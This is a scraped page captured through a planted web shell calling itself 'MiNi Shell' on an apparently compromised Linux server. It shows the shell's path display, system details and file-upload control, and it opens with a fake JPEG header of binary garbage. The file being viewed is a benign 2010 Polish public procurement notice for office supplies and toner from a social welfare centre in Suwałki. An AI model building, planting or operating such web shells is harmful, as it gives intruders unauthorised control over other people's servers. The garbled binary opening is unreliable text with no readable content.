JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100216/31977-N-2010.html

<p class="kh_header"><b>Suwałki: dostawa artykułów biurowych i papierniczych  oraz fabrycznie nowych (nie regenerowanych) tuszy i tonerów dla Miejskiego Ośrodka Pomocy Społecznej w Suwałkach</b><br>
<b>Numer ogłoszenia: 31977 - 2010; data zamieszczenia: 16.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. 23 Października 20, 16-400 Suwałki, woj. podlaskie, tel. 087 5628970, 5628973, faks 087 5628971.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> mops.suwalki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa artykułów biurowych i papierniczych  oraz fabrycznie nowych (nie regenerowanych) tuszy i tonerów dla Miejskiego Ośrodka Pomocy Społecznej w Suwałkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lp.	Nazwa toneru lub tuszu 	Jedn. miary	Ilość
1.	Toner HP 1100	szt.	7
2.	Toner HP 1200	szt.	7
3.	Toner HP 1300	szt.	12
4.	Toner HP 1320	szt.	65
5.	Toner HP 2015 dn	szt.	38
6.	Toner HP 2055 d	szt.	20
7.	Toner Canon iR 1024A	szt.	6
8.	Toner KM 2030 	szt.	4
9.	Toner KM 2560	szt.	3
10.	Toner KM 1860	szt.	1
11.	Toner Xerox 5225	szt.	3
12.	Ricoh MP-1500	szt.	3
13.	Toner Samsung ML-2850D	szt.	25
14.	Toner Sharp AR-M 165	szt.	4
15.	Toner Sharp AR-M 160	szt.	4
16.	Toner Sharp AL.-1217D	szt.	2
17.	Tusz HP 5940 czarny	szt.	3
18.	Tusz HP 5940 kol.	szt.	3
19.	Tusz HP 710C	szt.	2
20.	Toner Panasonic KX-FC258	szt.	3
21.	Toner HP Business 1000czarny	szt.	4
22.	Toner HP Business 1000 kolor	szt.	4
23.	Toner Panasonic KX-FLB758	szt.	3
24.	Tusz HP 990Cxi czarny	szt.	3
25.	Tusz HP 990Cxi kolor	szt.	3
26.	Tusz HP 1220C czarny	szt.	4
27.	Tusz HP 1220C kolor	szt.	4
28.	Toner Canon 6112	szt.	3
29.	Toner HP 2605 dn czarny	szt.	4
30.	Toner HP 2605 dn kolor	szt.	4
31.	Toner HP 2600n czarny	szt.	3
32.	Toner HP 2600n kolor	szt.	3


Lp.	Nazwa 	Jedn. miary	Ilość
1.	Papier ksero A4 biały 80g/m2 (białość CIE 161) w oryginalnych opakowaniach producenta	ryza	800
2.	Papier ksero A3 biały 80g/m2 (białość CIE 161) w oryginalnych opakowaniach producenta	ryza	20
3.	Koperty C-6 samoklejące białe	szt.	10000
4.	Koperty C- 5 samoklejące białe	szt.	3000
5.	Koperty aktowe C-4 samoklejące białe	szt.	500
6.	Koperty do akt z poszerzonym dnem i bokami (255mm x 390mm x 40mm) samoklejące białe	szt.	500
7.	Koperty DL białe samoklejące (110mm  x 220 mm) z okienkiem po prawej stronie	szt.	2000
8.	Segregator kartonowy A4 /75 marmurek gr. kartonu 2,1 mm	szt.	150
9.	Segregator  A4/75 wykonany z tektury obustronnie pokrytej ekologiczną folia polipropylenową o strukturze płótna, dźwignia wysokiej jakości z dociskaczem, otwór na palec z etykietą grzbietową, 2 lata gwarancji na mechanizm	szt.	300
10.	Segregator  A4/50wykonany z tektury obustronnie pokrytej ekologiczną folia polipropylenową o strukturze płótna, dźwignia wysokiej jakości z dociskaczem, otwór na palec z etykietą grzbietową, 2 lata gwarancji na mechanizm	szt.	200
11.	Segregator  A4/45 wykonany z tektury obustronnie pokrytej ekologiczną folia polipropylenową o strukturze płótna, dźwignia wysokiej jakości z dociskaczem, otwór na palec z etykietą grzbietową, 2 lata gwarancji na mechanizm	szt.	100
12.	Segregator  A5/75 wykonany z tektury obustronnie pokrytej ekologiczną folia polipropylenową o strukturze płótna, dźwignia wysokiej jakości z dociskaczem, otwór na palec z etykietą grzbietową, 2 lata gwarancji na mechanizm	szt.	50
13.	Przekładka A4 kolorowa wykonana z ekologicznego polipropylenu, wyposażona w kartę informacyjno-opisową do segregatora, ilość kartek 5	opak.	20
14.	Przekładka A4 kolorowa wykonana z ekologicznego polipropylenu, wyposażona w kartę informacyjno-opisową do segregatora, ilość kartek 10	opak.	20
15.	Przekładka A4  numeryczna kolorowa wykonana z ekologicznego polipropylenu,  do segregatora, ilość kartek 5	opak.	20
16.	Przekładka A4  numeryczna kolorowa wykonana z ekologicznego polipropylenu,  do segregatora, ilość kartek 10	opak.	30
17.	Przekładka A4  alfabetyczna kolorowa wykonana z ekologicznego polipropylenu,  do segregatora, ilość kartek 16	opak.	40
18.	Skoroszyt PCV A4 twardy, wpinany do segregatora	szt.	300
19.	Skoroszyt PCV A4 twardy	szt.	120
20.	Koszulka na dokumenty A4, 50 mikronów, krystaliczna, otwarta na górze	opak.

	10
21.	Koszulka z klapką na dokumenty A4, 100 mikronów	opak.	5
22.	Koszulka na dokumentyA5 50 mikronów, groszkowa, otwarta na górze	opak.	1
23.	Clipboard  teczka z klipsem A4 	szt.	10
24.	Teczka kopertowa A4  na zatrzask wykonana z ekologicznego polipropylenu	szt.	25
25.	Teczka pudełko z gumką A4  wykonana z ekologicznego polipropylenu, pojemność 3cm	szt.	20
26.	Teczka z gumką kartonowa A4 lakierowana	szt.	40
27.	Teczka skrzydłowa z rzepem PP A4, pojemność  ok. 280 kartek	szt.	25
28.	Teczka do podpisu A4 powlekana sztuczną skórą, 20-przegródek	szt.	5
29.	Szuflada na biurko A4 standard wykonana z trwałego polistyrenu	szt.	40
30.	Kalka ołówkowa/maszynowa A4 z woskiem czarna	opak.	5
31.	Bloczek samoprzylepny 76 x 76 12 szt. w opakowaniu	opak. 	12
32.	Kostka nieklejona 5 kolorów 85x85mm wys. 40mm 12 szt. w opakowaniu	opak. 	12
33.	Zakładki  indeksujące 20 x 50/50szt. x 4 kolory neon	opak.	20
34.	Długopisy jednorazowe różne kolory (nie gorsze niż Tetis 920, Reynolds 059, Spoko)	szt.	1000
35.	Długopis żelowy z wymiennym wkładem  różne kolory ( nie gorszy niż FX3 Penac)	szt.	40
36.	Wkłady do długopisu żelowego różne kolory	szt.	45
37.	Klipsy do papieru 19 mm (12 szt. w paczce)	opak. 	25
38.	Klipsy do papieru 25 mm (12 szt. w paczce)	opak. 	20
39.	Klipsy do papieru 41 mm (12 szt. w paczce)	opak.	15
40.	Przybornik na biurko z polistyrenu o wym. 230 x 170 x 50 mm z 8 przegrodami	szt.	12
41.	Sprężone powietrze do czyszczenia kurzu oraz pyłów  400 ml	szt.	10
42.	Ściereczki do czyszczenia ekranów 100 szt. w opakowaniu	szt.	10
43.	Płytki CD-R 80 min.	szt.	100
44.	Płytki DVD 120 min	szt.	100
45.	Nici lniane białe, waga 10 dkg, dł. 125m	szt.	10
46.	Tasiemka bawełniana w szpulkach	szt. 	8
47.	Długopis na sprężynce	szt.	15
48.	Markery różne kolory (nie gorsze niż Pentel, Donau, Staedtler)	szt.	30
49.	Zakreślacze  różne kolory (nie gorsze niż Pentel, Donau, Staedtler)	szt.	50
50.	Korektor w piórze z  metalową końcówką  (nie gorsze niż Pentel, Donau, Staedtler)	szt.	25
51.	Linijka przezroczysta 30cm	szt.	15
 52.	Gumka wielofunkcyjna  (do wymazywania ołówka i długopisu)	szt.	25
53.	Temperówka plastikowa pojedyńcza	szt.	20
54.	Drewniany ołówek z gumką twardość HB w opak 12 szt.	opak.	5
55.	Zszywacz w obudowie z tworzywa sztucznego na 25 kartek, do zszywek 24/6, 26/6, 2 lata gwarancji	szt.	15
56.	Duży zszywacz biurowy, dostosowany do zszywek 23/6, 23/24 na ok.200 kartek,  2 lata gwarancji	szt.	4
57.	Mały zszywacz na zszywki 10	szt.	10
58.	Zszywki 10 w opak. 1000 szt.	szt.	10
59.	Zszywki 24/6  w opak. 1000 szt.	opak.	30
60.	Zszywki 23/13  w opak. 1000 szt.	opak.	15
61.	Zszywki 23/24 w opak. 1000 szt.	opak.	5
62.	Spinacze biurowe 28 mm 100 szt. w opak.	opak.	30
63.	Spinacze biurowe 50 mm 100 szt. w opak.	opak.	20
64. 	Dziurkacz biurowy za wskaźnikiem środka na 25 kartek 2 lata gwarancji	szt.	15
65.	Duży dziurkacz biurowy na 100 kartek, 2 lata gwarancji	szt.	2
66.	Taśma klejąca przezroczysta 24 mm, 12 sztuk  w opak.	opak.	5
67.	 Klej w sztyfcie 20g  12 szt. w opak.	opak.	1
68. 	Nożyczki ze stali nierdzewnej ok. 21 cm	szt.	10
69.	Nożyczki  ze stali nierdzewnej ok. 15 cm	szt.	10
70.	Pineski do tablic korkowych (beczułki) 50 szt. w opak.	opak.	10
71.	Tablica korkowa 100 cm x 200 cm	szt.	1
72.	Dziennik korespondencyjny 200 kartkowy	szt.	10
73.	Skoroszyt papierowy	szt.	3000
74.	Skoroszyt papierowy oczkowy	szt.	300
75.	Skoroszyt papierowy z zawieszką	szt.	2500
76.	Teczka papierowa wiązana	szt.	250
77.	Skorowidz alfabetyczny A4 twarda oprawa 96 kartek	szt.	25
78.	Blok A4 twarda oprawa 96 kartek	szt.	40
79.	Zeszyt A5 w kratkę 96 kartek	szt.	70
	Zeszyt A5 w kratkę 16 kartek	szt.	50
80.	Zeszyt A5 w kratkę 32 kartki	szt.	25
81.	Kalkulator, 12 pozycyjny wyświetlacz, podwójne zasilanie, cztery zera po przecinku ( nie gorszy niż Casio, Citizen) 2 lata gwarancji	szt.	10
82.	Okładki  do bindowania - dolna tekturowa opak. 100 szt.	opak.	1
83.	Okładki  do bindowania - górna plastikowa  przezroczysta  opak. 100 szt.	opak.	1
84.	Grzbiety do bindowania średnica 20 mm opak. 100 szt.	opak.	1
85.	Okładki do termobindownicy	szt.	50
86.	Rozszywacze	szt.	15
87.	Tusz  do pieczątek czerwony buteleczce z końcówką 	szt.	25
88.	Poduszki do pieczątek czerwone	szt.	10
89.	Flamastry w komplecie 12 sztuk opak.	szt.	10
90.	Cienkopisy różne kolory (nie gorsze niż PelikanStaedtler)	szt.	50
91.	Wkłady zenith oryginalne	szt.	30
92.	Noż do listów metalowy 	szt.	5
93.	Gilotyna do cięcia papieru z ogranicznikiem formatu i nożem stalowym. Samo ostrzące otrze z blokadą i osłoną. Długość cięcia min. 360 mm.	szt.	3
94.	Stojak obrotowy metalowy  na broszury A4, 9 kieszeni, średnica 320 mm, wys. 540 mm, kol. srebrny	szt.	3
95.	Stojak na broszury z polistyrenu, 4 kieszenie, do instalacji ściennej,  wym. 119 x 127 x 275	szt.	5
96.	Papier dyplomowy - ozdobny 25 arkuszy w opakowaniu	szt.	12
97.	Papier kredowy 250 g/m2 250 arkuszy w opakowaniu	szt.	5
98.	Pojemnik kartonowy lakierowany A4 pojemność do 1000 kartek o gramaturze 80g/m2	szt.	50
99.	Identyfikator  z  klipsem 90x55 mm	szt.	100
100.	Pendrive  4GB	szt.	15.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6, 30.19.00.00-7, 30.19.76.44-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie stosownego zaświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie referencji (min. 2) z ostatnich 3 lat</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> mops.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 16-400 Suwałki, ul. 23 Października 20, Sekretariat - pok. nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2010 godzina 10:00, miejsce: 16-400 Suwałki, ul. 23 Października 20, Sekretariat - pok. nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com